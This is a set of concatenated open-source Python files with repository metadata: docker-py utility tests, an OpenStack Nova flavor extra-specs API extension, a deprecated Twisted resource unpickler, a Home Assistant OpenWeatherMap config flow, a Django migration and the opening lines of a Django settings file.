self.os_environ = os.environ.copy()
def tearDown(self):
os.environ = self.os_environ
def test_kwargs_from_env_empty(self):
os.environ.update(DOCKER_HOST='',
DOCKER_CERT_PATH='',
DOCKER_TLS_VERIFY='')
kwargs = kwargs_from_env()
self.assertEqual(None, kwargs.get('base_url'))
self.assertEqual(None, kwargs.get('tls'))
def test_kwargs_from_env_tls(self):
os.environ.update(DOCKER_HOST='tcp://192.168.59.103:2376',
DOCKER_CERT_PATH=TEST_CERT_DIR,
DOCKER_TLS_VERIFY='1')
kwargs = kwargs_from_env(assert_hostname=False)
self.assertEqual('https://192.168.59.103:2376', kwargs['base_url'])
self.assertTrue('ca.pem' in kwargs['tls'].verify)
self.assertTrue('cert.pem' in kwargs['tls'].cert[0])
self.assertTrue('key.pem' in kwargs['tls'].cert[1])
self.assertEqual(False, kwargs['tls'].assert_hostname)
try:
client = Client(**kwargs)
self.assertEqual(kwargs['base_url'], client.base_url)
self.assertEqual(kwargs['tls'].verify, client.verify)
self.assertEqual(kwargs['tls'].cert, client.cert)
except TypeError as e:
self.fail(e)
    def test_kwargs_from_env_no_cert_path(self):
        temp_dir = None  # ensure the name is bound for the finally block
        try:
            temp_dir = tempfile.mkdtemp()
cert_dir = os.path.join(temp_dir, '.docker')
shutil.copytree(TEST_CERT_DIR, cert_dir)
os.environ.update(HOME=temp_dir,
DOCKER_CERT_PATH='',
DOCKER_TLS_VERIFY='1')
kwargs = kwargs_from_env()
self.assertIn(cert_dir, kwargs['tls'].verify)
self.assertIn(cert_dir, kwargs['tls'].cert[0])
self.assertIn(cert_dir, kwargs['tls'].cert[1])
finally:
if temp_dir:
shutil.rmtree(temp_dir)
class UtilsTest(base.BaseTestCase):
longMessage = True
def generate_tempfile(self, file_content=None):
"""
Generates a temporary file for tests with the content
of 'file_content' and returns the filename.
Don't forget to unlink the file with os.unlink() after.
"""
local_tempfile = tempfile.NamedTemporaryFile(delete=False)
local_tempfile.write(file_content.encode('UTF-8'))
local_tempfile.close()
return local_tempfile.name
def test_convert_volume_binds_empty(self):
self.assertEqual(convert_volume_binds({}), [])
self.assertEqual(convert_volume_binds([]), [])
def test_convert_volume_binds_list(self):
data = ['/a:/a:ro', '/b:/c:z']
self.assertEqual(convert_volume_binds(data), data)
def test_convert_volume_binds_complete(self):
data = {
'/mnt/vol1': {
'bind': '/data',
'mode': 'ro'
}
}
self.assertEqual(convert_volume_binds(data), ['/mnt/vol1:/data:ro'])
def test_convert_volume_binds_compact(self):
data = {
'/mnt/vol1': '/data'
}
self.assertEqual(convert_volume_binds(data), ['/mnt/vol1:/data:rw'])
def test_convert_volume_binds_no_mode(self):
data = {
'/mnt/vol1': {
'bind': '/data'
}
}
self.assertEqual(convert_volume_binds(data), ['/mnt/vol1:/data:rw'])
def test_convert_volume_binds_unicode_bytes_input(self):
if six.PY2:
expected = [unicode('/mnt/지연:/unicode/박:rw', 'utf-8')]
data = {
'/mnt/지연': {
'bind': '/unicode/박',
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
else:
expected = ['/mnt/지연:/unicode/박:rw']
data = {
bytes('/mnt/지연', 'utf-8'): {
'bind': bytes('/unicode/박', 'utf-8'),
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
def test_convert_volume_binds_unicode_unicode_input(self):
if six.PY2:
expected = [unicode('/mnt/지연:/unicode/박:rw', 'utf-8')]
data = {
unicode('/mnt/지연', 'utf-8'): {
'bind': unicode('/unicode/박', 'utf-8'),
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
else:
expected = ['/mnt/지연:/unicode/박:rw']
data = {
'/mnt/지연': {
'bind': '/unicode/박',
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
def test_parse_repository_tag(self):
self.assertEqual(parse_repository_tag("root"),
("root", None))
self.assertEqual(parse_repository_tag("root:tag"),
("root", "tag"))
self.assertEqual(parse_repository_tag("user/repo"),
("user/repo", None))
self.assertEqual(parse_repository_tag("user/repo:tag"),
("user/repo", "tag"))
self.assertEqual(parse_repository_tag("url:5000/repo"),
("url:5000/repo", None))
self.assertEqual(parse_repository_tag("url:5000/repo:tag"),
("url:5000/repo", "tag"))
def test_parse_bytes(self):
self.assertEqual(parse_bytes("512MB"), (536870912))
self.assertEqual(parse_bytes("512M"), (536870912))
self.assertRaises(DockerException, parse_bytes, "512MK")
self.assertRaises(DockerException, parse_bytes, "512L")
def test_parse_host(self):
invalid_hosts = [
'0.0.0.0',
'tcp://',
'udp://127.0.0.1',
'udp://127.0.0.1:2375',
]
valid_hosts = {
'0.0.0.1:5555': 'http://0.0.0.1:5555',
':6666': 'http://127.0.0.1:6666',
'tcp://:7777': 'http://127.0.0.1:7777',
'http://:7777': 'http://127.0.0.1:7777',
'https://kokia.jp:2375': 'https://kokia.jp:2375',
'unix:///var/run/docker.sock': 'http+unix:///var/run/docker.sock',
'unix://': 'http+unix://var/run/docker.sock',
'somehost.net:80/service/swarm': (
'http://somehost.net:80/service/swarm'
),
}
for host in invalid_hosts:
with pytest.raises(DockerException):
parse_host(host, None)
for host, expected in valid_hosts.items():
self.assertEqual(parse_host(host, None), expected, msg=host)
def test_parse_host_empty_value(self):
unix_socket = 'http+unix://var/run/docker.sock'
tcp_port = 'http://127.0.0.1:2375'
for val in [None, '']:
for platform in ['darwin', 'linux2', None]:
assert parse_host(val, platform) == unix_socket
assert parse_host(val, 'win32') == tcp_port
def test_parse_env_file_proper(self):
env_file = self.generate_tempfile(
file_content='USER=jdoe\nPASS=secret')
get_parse_env_file = parse_env_file(env_file)
self.assertEqual(get_parse_env_file,
{'USER': 'jdoe', 'PASS': 'secret'})
os.unlink(env_file)
def test_parse_env_file_commented_line(self):
env_file = self.generate_tempfile(
file_content='USER=jdoe\n#PASS=secret')
        get_parse_env_file = parse_env_file(env_file)
self.assertEqual(get_parse_env_file, {'USER': 'jdoe'})
os.unlink(env_file)
def test_parse_env_file_invalid_line(self):
env_file = self.generate_tempfile(
file_content='USER jdoe')
self.assertRaises(
DockerException, parse_env_file, env_file)
os.unlink(env_file)
def test_convert_filters(self):
tests = [
({'dangling': True}, '{"dangling": ["true"]}'),
({'dangling': "true"}, '{"dangling": ["true"]}'),
({'exited': 0}, '{"exited": [0]}'),
({'exited': [0, 1]}, '{"exited": [0, 1]}'),
]
for filters, expected in tests:
self.assertEqual(convert_filters(filters), expected)
def test_decode_json_header(self):
obj = {'a': 'b', 'c': 1}
data = None
if six.PY3:
data = base64.urlsafe_b64encode(bytes(json.dumps(obj), 'utf-8'))
else:
data = base64.urlsafe_b64encode(json.dumps(obj))
decoded_data = decode_json_header(data)
self.assertEqual(obj, decoded_data)
def test_803_urlsafe_encode(self):
auth_data = {
'username': 'root',
'password': 'GR?XGR?XGR?XGR?X'
}
encoded = encode_header(auth_data)
assert b'/' not in encoded
assert b'_' in encoded
def test_resolve_repository_name(self):
# docker hub library image
self.assertEqual(
resolve_repository_name('image'),
('index.docker.io', 'image'),
)
# docker hub image
self.assertEqual(
resolve_repository_name('username/image'),
('index.docker.io', 'username/image'),
)
# private registry
self.assertEqual(
resolve_repository_name('my.registry.net/image'),
('my.registry.net', 'image'),
)
# private registry with port
self.assertEqual(
resolve_repository_name('my.registry.net:5000/image'),
('my.registry.net:5000', 'image'),
)
# private registry with username
self.assertEqual(
resolve_repository_name('my.registry.net/username/image'),
('my.registry.net', 'username/image'),
)
# no dots but port
self.assertEqual(
resolve_repository_name('hostname:5000/image'),
('hostname:5000', 'image'),
)
# no dots but port and username
self.assertEqual(
resolve_repository_name('hostname:5000/username/image'),
('hostname:5000', 'username/image'),
)
# localhost
self.assertEqual(
resolve_repository_name('localhost/image'),
('localhost', 'image'),
)
# localhost with username
self.assertEqual(
resolve_repository_name('localhost/username/image'),
('localhost', 'username/image'),
)
def test_resolve_authconfig(self):
auth_config = {
'https://index.docker.io/v1/': {'auth': 'indexuser'},
'my.registry.net': {'auth': 'privateuser'},
'http://legacy.registry.url/v1/': {'auth': 'legacyauth'}
}
# hostname only
self.assertEqual(
resolve_authconfig(auth_config, 'my.registry.net'),
{'auth': 'privateuser'}
)
# no protocol
self.assertEqual(
resolve_authconfig(auth_config, 'my.registry.net/v1/'),
{'auth': 'privateuser'}
)
# no path
self.assertEqual(
resolve_authconfig(auth_config, 'http://my.registry.net'),
{'auth': 'privateuser'}
)
# no path, trailing slash
self.assertEqual(
resolve_authconfig(auth_config, 'http://my.registry.net/'),
{'auth': 'privateuser'}
)
# no path, wrong secure protocol
self.assertEqual(
resolve_authconfig(auth_config, 'https://my.registry.net'),
{'auth': 'privateuser'}
)
# no path, wrong insecure protocol
self.assertEqual(
resolve_authconfig(auth_config, 'http://index.docker.io'),
{'auth': 'indexuser'}
)
# with path, wrong protocol
self.assertEqual(
resolve_authconfig(auth_config, 'https://my.registry.net/v1/'),
{'auth': 'privateuser'}
)
# default registry
self.assertEqual(
resolve_authconfig(auth_config), {'auth': 'indexuser'}
)
# default registry (explicit None)
self.assertEqual(
resolve_authconfig(auth_config, None), {'auth': 'indexuser'}
)
# fully explicit
self.assertEqual(
resolve_authconfig(auth_config, 'http://my.registry.net/v1/'),
{'auth': 'privateuser'}
)
# legacy entry in config
self.assertEqual(
resolve_authconfig(auth_config, 'legacy.registry.url'),
{'auth': 'legacyauth'}
)
# no matching entry
self.assertTrue(
resolve_authconfig(auth_config, 'does.not.exist') is None
)
def test_resolve_registry_and_auth(self):
auth_config = {
'https://index.docker.io/v1/': {'auth': 'indexuser'},
'my.registry.net': {'auth': 'privateuser'},
}
# library image
image = 'image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
{'auth': 'indexuser'},
)
# docker hub image
image = 'username/image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
{'auth': 'indexuser'},
)
# private registry
image = 'my.registry.net/image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
{'auth': 'privateuser'},
)
# unauthenticated registry
image = 'other.registry.net/image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
None,
)
class PortsTest(base.BaseTestCase):
def test_split_port_with_host_ip(self):
internal_port, external_port = split_port("127.0.0.1:1000:2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, [("127.0.0.1", "1000")])
def test_split_port_with_protocol(self):
internal_port, external_port = split_port("127.0.0.1:1000:2000/udp")
self.assertEqual(internal_port, ["2000/udp"])
self.assertEqual(external_port, [("127.0.0.1", "1000")])
def test_split_port_with_host_ip_no_port(self):
internal_port, external_port = split_port("127.0.0.1::2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, [("127.0.0.1", None)])
def test_split_port_range_with_host_ip_no_port(self):
internal_port, external_port = split_port("127.0.0.1::2000-2001")
self.assertEqual(internal_port, ["2000", "2001"])
self.assertEqual(external_port,
[("127.0.0.1", None), ("127.0.0.1", None)])
def test_split_port_with_host_port(self):
internal_port, external_port = split_port("1000:2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, ["1000"])
def test_split_port_range_with_host_port(self):
internal_port, external_port = split_port("1000-1001:2000-2001")
self.assertEqual(internal_port, ["2000", "2001"])
self.assertEqual(external_port, ["1000", "1001"])
def test_split_port_no_host_port(self):
internal_port, external_port = split_port("2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, None)
def test_split_port_range_no_host_port(self):
internal_port, external_port = split_port("2000-2001")
self.assertEqual(internal_port, ["2000", "2001"])
self.assertEqual(external_port, None)
def test_split_port_range_with_protocol(self):
internal_port, external_port = split_port(
"127.0.0.1:1000-1001:2000-2001/udp")
self.assertEqual(internal_port, ["2000/udp", "2001/udp"])
self.assertEqual(external_port,
[("127.0.0.1", "1000"), ("127.0.0.1", "1001")])
def test_split_port_invalid(self):
self.assertRaises(ValueError,
lambda: split_port("0.0.0.0:1000:2000:tcp"))
def test_non_matching_length_port_ranges(self):
self.assertRaises(
ValueError,
lambda: split_port("0.0.0.0:1000-1010:2000-2002/tcp")
)
def test_port_and_range_invalid(self):
self.assertRaises(ValueError,
lambda: split_port("0.0.0.0:1000:2000-2002/tcp"))
def test_port_only_with_colon(self):
self.assertRaises(ValueError,
lambda: split_port(":80"))
def test_host_only_with_colon(self):
self.assertRaises(ValueError,
lambda: split_port("localhost:"))
def test_build_port_bindings_with_one_port(self):
port_bindings = build_port_bindings(["127.0.0.1:1000:1000"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
def test_build_port_bindings_with_matching_internal_ports(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000:1000", "127.0.0.1:2000:1000"])
self.assertEqual(port_bindings["1000"],
[("127.0.0.1", "1000"), ("127.0.0.1", "2000")])
def test_build_port_bindings_with_nonmatching_internal_ports(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000:1000", "127.0.0.1:2000:2000"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
self.assertEqual(port_bindings["2000"], [("127.0.0.1", "2000")])
def test_build_port_bindings_with_port_range(self):
port_bindings = build_port_bindings(["127.0.0.1:1000-1001:1000-1001"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
self.assertEqual(port_bindings["1001"], [("127.0.0.1", "1001")])
def test_build_port_bindings_with_matching_internal_port_ranges(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000-1001:1000-1001", "127.0.0.1:2000-2001:1000-1001"])
self.assertEqual(port_bindings["1000"],
[("127.0.0.1", "1000"), ("127.0.0.1", "2000")])
self.assertEqual(port_bindings["1001"],
[("127.0.0.1", "1001"), ("127.0.0.1", "2001")])
def test_build_port_bindings_with_nonmatching_internal_port_ranges(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000:1000", "127.0.0.1:2000:2000"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
self.assertEqual(port_bindings["2000"], [("127.0.0.1", "2000")])
class ExcludePathsTest(base.BaseTestCase):
dirs = [
'foo',
'foo/bar',
'bar',
]
files = [
'Dockerfile',
'Dockerfile.alt',
'.dockerignore',
'a.py',
'a.go',
'b.py',
'cde.py',
'foo/a.py',
'foo/b.py',
'foo/bar/a.py',
'bar/a.py',
]
all_paths = set(dirs + files)
def setUp(self):
self.base = make_tree(self.dirs, self.files)
def tearDown(self):
shutil.rmtree(self.base)
def exclude(self, patterns, dockerfile=None):
return set(exclude_paths(self.base, patterns, dockerfile=dockerfile))
def test_no_excludes(self):
assert self.exclude(['']) == self.all_paths
def test_no_dupes(self):
paths = exclude_paths(self.base, ['!a.py'])
assert sorted(paths) == sorted(set(paths))
def test_wildcard_exclude(self):
assert self.exclude(['*']) == set(['Dockerfile', '.dockerignore'])
def test_exclude_dockerfile_dockerignore(self):
"""
Even if the .dockerignore file explicitly says to exclude
Dockerfile and/or .dockerignore, don't exclude them from
the actual tar file.
"""
assert self.exclude(['Dockerfile', '.dockerignore']) == self.all_paths
def test_exclude_custom_dockerfile(self):
"""
If we're using a custom Dockerfile, make sure that's not
excluded.
"""
assert self.exclude(['*'], dockerfile='Dockerfile.alt') == \
set(['Dockerfile.alt', '.dockerignore'])
def test_single_filename(self):
assert self.exclude(['a.py']) == self.all_paths - set(['a.py'])
# As odd as it sounds, a filename pattern with a trailing slash on the
# end *will* result in that file being excluded.
def test_single_filename_trailing_slash(self):
assert self.exclude(['a.py/']) == self.all_paths - set(['a.py'])
def test_wildcard_filename_start(self):
assert self.exclude(['*.py']) == self.all_paths - set([
'a.py', 'b.py', 'cde.py',
])
def test_wildcard_with_exception(self):
assert self.exclude(['*.py', '!b.py']) == self.all_paths - set([
'a.py', 'cde.py',
])
def test_wildcard_with_wildcard_exception(self):
assert self.exclude(['*.*', '!*.go']) == self.all_paths - set([
'a.py', 'b.py', 'cde.py', 'Dockerfile.alt',
])
def test_wildcard_filename_end(self):
assert self.exclude(['a.*']) == self.all_paths - set(['a.py', 'a.go'])
def test_question_mark(self):
assert self.exclude(['?.py']) == self.all_paths - set(['a.py', 'b.py'])
def test_single_subdir_single_filename(self):
assert self.exclude(['foo/a.py']) == self.all_paths - set(['foo/a.py'])
def test_single_subdir_wildcard_filename(self):
assert self.exclude(['foo/*.py']) == self.all_paths - set([
'foo/a.py', 'foo/b.py',
])
def test_wildcard_subdir_single_filename(self):
assert self.exclude(['*/a.py']) == self.all_paths - set([
'foo/a.py', 'bar/a.py',
])
def test_wildcard_subdir_wildcard_filename(self):
assert self.exclude(['*/*.py']) == self.all_paths - set([
'foo/a.py', 'foo/b.py', 'bar/a.py',
])
def test_directory(self):
assert self.exclude(['foo']) == self.all_paths - set([
'foo', 'foo/a.py', 'foo/b.py',
'foo/bar', 'foo/bar/a.py',
])
def test_directory_with_trailing_slash(self):
        assert self.exclude(['foo/']) == self.all_paths - set([
'foo', 'foo/a.py', 'foo/b.py',
'foo/bar', 'foo/bar/a.py',
])
def test_directory_with_single_exception(self):
assert self.exclude(['foo', '!foo/bar/a.py']) == self.all_paths - set([
'foo/a.py', 'foo/b.py',
])
def test_directory_with_subdir_exception(self):
assert self.exclude(['foo', '!foo/bar']) == self.all_paths - set([
'foo/a.py', 'foo/b.py',
])
def test_directory_with_wildcard_exception(self):
assert self.exclude(['foo', '!foo/*.py']) == self.all_paths - set([
'foo/bar', 'foo/bar/a.py',
])
def test_subdirectory(self):
assert self.exclude(['foo/bar']) == self.all_paths - set([
'foo/bar', 'foo/bar/a.py',
])
| {
"content_hash": "600332e6927ea7e23b95db806a2545b4",
"timestamp": "",
"source": "github",
"line_count": 792,
"max_line_length": 79,
"avg_line_length": 35.96590909090909,
"alnum_prop": 0.5615938213094611,
"repo_name": "shakamunyi/docker-py",
"id": "04183f9f8718b95283807f72d9429d8b9de9d6d5",
"size": "28533",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/utils_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3231"
},
{
"name": "Python",
"bytes": "1156437"
},
{
"name": "Shell",
"bytes": "749"
}
],
"symlink_target": ""
} |
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import db
from nova import exception
from nova.openstack.common.db import exception as db_exc
from nova.openstack.common.gettextutils import _
class ExtraSpecsTemplate(xmlutil.TemplateBuilder):
def construct(self):
extra_specs_dict = xmlutil.make_flat_dict('extra_specs', colon_ns=True)
return xmlutil.MasterTemplate(extra_specs_dict, 1)
class ExtraSpecTemplate(xmlutil.TemplateBuilder):
def construct(self):
sel = xmlutil.Selector(xmlutil.get_items, 0)
root = xmlutil.TemplateElement('extra_spec', selector=sel)
root.set('key', 0)
root.text = 1
return xmlutil.MasterTemplate(root, 1)
class FlavorExtraSpecsController(object):
"""The flavor extra specs API controller for the OpenStack API."""
ALIAS = 'flavor-extra-specs'
def __init__(self, *args, **kwargs):
super(FlavorExtraSpecsController, self).__init__(*args, **kwargs)
self.authorize = extensions.extension_authorizer('compute',
'v3:' + self.ALIAS)
def _get_extra_specs(self, context, flavor_id):
extra_specs = db.flavor_extra_specs_get(context, flavor_id)
return dict(extra_specs=extra_specs)
def _check_body(self, body):
if body is None or body == "":
expl = _('No Request Body')
raise webob.exc.HTTPBadRequest(explanation=expl)
@wsgi.serializers(xml=ExtraSpecsTemplate)
def index(self, req, flavor_id):
"""Returns the list of extra specs for a given flavor."""
context = req.environ['nova.context']
self.authorize(context, action='index')
return self._get_extra_specs(context, flavor_id)
@wsgi.serializers(xml=ExtraSpecsTemplate)
@wsgi.response(201)
def create(self, req, flavor_id, body):
context = req.environ['nova.context']
self.authorize(context, action='create')
self._check_body(body)
specs = body.get('extra_specs', {})
if not specs or type(specs) is not dict:
raise webob.exc.HTTPBadRequest(_('No or bad extra_specs provided'))
try:
db.flavor_extra_specs_update_or_create(context, flavor_id,
specs)
except db_exc.DBDuplicateEntry as error:
raise webob.exc.HTTPBadRequest(explanation=error.format_message())
return body
@wsgi.serializers(xml=ExtraSpecTemplate)
def update(self, req, flavor_id, id, body):
context = req.environ['nova.context']
self.authorize(context, action='update')
self._check_body(body)
if id not in body:
expl = _('Request body and URI mismatch')
raise webob.exc.HTTPBadRequest(explanation=expl)
if len(body) > 1:
expl = _('Request body contains too many items')
raise webob.exc.HTTPBadRequest(explanation=expl)
try:
db.flavor_extra_specs_update_or_create(context, flavor_id,
body)
except db_exc.DBDuplicateEntry as error:
raise webob.exc.HTTPBadRequest(explanation=error.format_message())
return body
@wsgi.serializers(xml=ExtraSpecTemplate)
def show(self, req, flavor_id, id):
"""Return a single extra spec item."""
context = req.environ['nova.context']
self.authorize(context, action='show')
try:
extra_spec = db.flavor_extra_specs_get_item(context,
flavor_id, id)
return extra_spec
except exception.InstanceTypeExtraSpecsNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
@wsgi.response(204)
@extensions.expected_errors(404)
def delete(self, req, flavor_id, id):
"""Deletes an existing extra spec."""
context = req.environ['nova.context']
self.authorize(context, action='delete')
try:
db.flavor_extra_specs_delete(context, flavor_id, id)
except exception.InstanceTypeExtraSpecsNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FlavorsExtraSpecs(extensions.V3APIExtensionBase):
"""Flavors Extension."""
name = 'FlavorsExtraSpecs'
alias = FlavorExtraSpecsController.ALIAS
namespace = "http://docs.openstack.org/compute/core/%s/v3" % alias
version = 1
def get_resources(self):
extra_specs = extensions.ResourceExtension(
self.alias,
FlavorExtraSpecsController(),
parent=dict(member_name='flavor', collection_name='flavors'))
return [extra_specs]
def get_controller_extensions(self):
return []
| {
"content_hash": "0438665eefabd6f8171e27df9749dfcd",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 79,
"avg_line_length": 39.20634920634921,
"alnum_prop": 0.6246963562753036,
"repo_name": "imsplitbit/nova",
"id": "39deab8024431f45367015041ce070bd731e2c2f",
"size": "5621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/plugins/v3/flavors_extraspecs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13518591"
},
{
"name": "Shell",
"bytes": "16950"
}
],
"symlink_target": ""
} |
"""
I contain ResourceUnpickler, which will unpickle any python object
named with the file extension .trp.
"""
import warnings
from pickle import Unpickler
_msg = ("is deprecated as of Twisted 9.0. Resource persistence "
"is beyond the scope of Twisted Web.")
warnings.warn("twisted.web.trp " + _msg , DeprecationWarning, stacklevel=2)
def ResourceUnpickler(path, registry = None):
warnings.warn(
"twisted.web.trp.ResourceUnpickler " + _msg ,
DeprecationWarning, stacklevel=2)
fl = open(path)
result = Unpickler(fl).load()
return result
| {
"content_hash": "8514fb999f8a417b399ddf89f71ee88a",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 75,
"avg_line_length": 29.1,
"alnum_prop": 0.7027491408934707,
"repo_name": "movmov/cc",
"id": "e9cfcd3fd5cec904587be59dfa5096071d99d377",
"size": "665",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "vendor/Twisted-10.0.0/twisted/web/trp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
"""Config flow for OpenWeatherMap."""
from __future__ import annotations
from pyowm import OWM
from pyowm.commons.exceptions import APIRequestError, UnauthorizedError
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
CONF_API_KEY,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_MODE,
CONF_NAME,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from .const import (
CONF_LANGUAGE,
CONFIG_FLOW_VERSION,
DEFAULT_FORECAST_MODE,
DEFAULT_LANGUAGE,
DEFAULT_NAME,
DOMAIN,
FORECAST_MODES,
LANGUAGES,
)
class OpenWeatherMapConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Config flow for OpenWeatherMap."""
VERSION = CONFIG_FLOW_VERSION
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> OpenWeatherMapOptionsFlow:
"""Get the options flow for this handler."""
return OpenWeatherMapOptionsFlow(config_entry)
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
errors = {}
if user_input is not None:
latitude = user_input[CONF_LATITUDE]
longitude = user_input[CONF_LONGITUDE]
await self.async_set_unique_id(f"{latitude}-{longitude}")
self._abort_if_unique_id_configured()
try:
api_online = await _is_owm_api_online(
self.hass, user_input[CONF_API_KEY], latitude, longitude
)
if not api_online:
errors["base"] = "invalid_api_key"
except UnauthorizedError:
errors["base"] = "invalid_api_key"
except APIRequestError:
errors["base"] = "cannot_connect"
if not errors:
return self.async_create_entry(
title=user_input[CONF_NAME], data=user_input
)
schema = vol.Schema(
{
vol.Required(CONF_API_KEY): str,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): str,
vol.Optional(
CONF_LATITUDE, default=self.hass.config.latitude
): cv.latitude,
vol.Optional(
CONF_LONGITUDE, default=self.hass.config.longitude
): cv.longitude,
vol.Optional(CONF_MODE, default=DEFAULT_FORECAST_MODE): vol.In(
FORECAST_MODES
),
vol.Optional(CONF_LANGUAGE, default=DEFAULT_LANGUAGE): vol.In(
LANGUAGES
),
}
)
return self.async_show_form(step_id="user", data_schema=schema, errors=errors)
class OpenWeatherMapOptionsFlow(config_entries.OptionsFlow):
"""Handle options."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Initialize options flow."""
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
return self.async_show_form(
step_id="init",
data_schema=self._get_options_schema(),
)
def _get_options_schema(self):
return vol.Schema(
{
vol.Optional(
CONF_MODE,
default=self.config_entry.options.get(
CONF_MODE,
self.config_entry.data.get(CONF_MODE, DEFAULT_FORECAST_MODE),
),
): vol.In(FORECAST_MODES),
vol.Optional(
CONF_LANGUAGE,
default=self.config_entry.options.get(
CONF_LANGUAGE,
self.config_entry.data.get(CONF_LANGUAGE, DEFAULT_LANGUAGE),
),
): vol.In(LANGUAGES),
}
)
async def _is_owm_api_online(hass, api_key, lat, lon):
owm = OWM(api_key).weather_manager()
return await hass.async_add_executor_job(owm.weather_at_coords, lat, lon)
| {
"content_hash": "9e8bb6532f951cd388f45a85cf9d9f69",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 86,
"avg_line_length": 32.18796992481203,
"alnum_prop": 0.5631861714552675,
"repo_name": "nkgilley/home-assistant",
"id": "c418231946f41848e1b313124b578950d1fbe95f",
"size": "4281",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/openweathermap/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "51597279"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
import form.models
class Migration(migrations.Migration):
dependencies = [
('form', '0016_auto_20160620_0006'),
]
operations = [
migrations.RemoveField(
model_name='packagecomparison',
name='likert_quality',
),
migrations.RemoveField(
model_name='packagecomparison',
name='na_likert_quality',
),
migrations.AddField(
model_name='packagecomparison',
name='likert_quality_community',
field=models.IntegerField(blank=True, null=True, verbose_name='Which package has a better community for clients of the package?', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)]),
),
migrations.AddField(
model_name='packagecomparison',
name='likert_quality_documentation',
field=models.IntegerField(blank=True, null=True, verbose_name='Which package has better documentation?', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)]),
),
migrations.AddField(
model_name='packagecomparison',
name='na_likert_quality_community',
field=form.models.NotApplicableField(default=False, verbose_name="Don't know"),
),
migrations.AddField(
model_name='packagecomparison',
name='na_likert_quality_documentation',
field=form.models.NotApplicableField(default=False, verbose_name="Don't know"),
),
migrations.AlterField(
model_name='prequestionnaire',
name='professional_years',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='How many years of experience do you have programming professionally?', choices=[('Less than one year', 'Less than one year'), ('1-2 years', '1-2 years'), ('3-5 years', '3-5 years'), ('6-9 years', '6-9 years'), ('10-19 years', '10-19 years'), ('20 or more years', '20 or more years')]),
),
]
| {
"content_hash": "f770f18e79b0aff7f287b0efe82cb74a",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 377,
"avg_line_length": 43.93617021276596,
"alnum_prop": 0.6024213075060533,
"repo_name": "andrewhead/Search-Task-Logger",
"id": "ae1f815fc9bdb2d1e7f4ac1e95a30bb0b6fc090c",
"size": "2089",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "searchlogger/form/migrations/0017_auto_20160620_0023.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2993"
},
{
"name": "DIGITAL Command Language",
"bytes": "492"
},
{
"name": "HTML",
"bytes": "11766"
},
{
"name": "Python",
"bytes": "100170"
},
{
"name": "Shell",
"bytes": "212"
}
],
"symlink_target": ""
} |
"""
Django settings for arguman project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
from datetime import timedelta
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
